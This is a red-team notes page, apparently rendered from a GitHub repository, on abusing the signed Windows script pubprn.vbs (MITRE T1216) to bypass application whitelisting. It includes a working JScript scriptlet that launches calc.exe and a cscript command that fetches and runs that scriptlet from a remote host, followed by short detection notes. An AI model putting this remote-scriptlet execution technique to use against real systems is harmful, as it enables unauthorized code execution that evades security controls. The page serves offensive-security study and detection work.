Skip to content

Latest commit

 

History

History
57 lines (40 loc) · 1.29 KB

File metadata and controls

57 lines (40 loc) · 1.29 KB
description
Signed Script Proxy Execution - bypass application whitelisting using pubprn.vbs

pubprn.vbs Signed Script Code Execution

Execution

Using pubprn.vbs, we will execute code to launch calc.exe. First of, the xml that will be executed by the script:

{% code title="http://192.168.2.71/tools/mitre/proxy-script/proxy.sct" %}

<?XML version="1.0"?>
<scriptlet>

<registration
    description="Bandit"
    progid="Bandit"
    version="1.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"   
	>
</registration>

<script language="JScript">
<![CDATA[
		var r = new ActiveXObject("WScript.Shell").Run("calc.exe");	
]]>
</script>

</scriptlet>

{% endcode %}

{% code title="attacker@victim" %}

cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:http://192.168.2.71/tools/mitre/proxy-script/proxy.sct

{% endcode %}

Observations

Calc.exe gets spawned by cscript.exe which immediately closes leaving the calc.exe process orphan:

Monitoring commandlines can be useful in detecting the script being abused:

References

{% embed url="https://attack.mitre.org/wiki/Technique/T1216" %}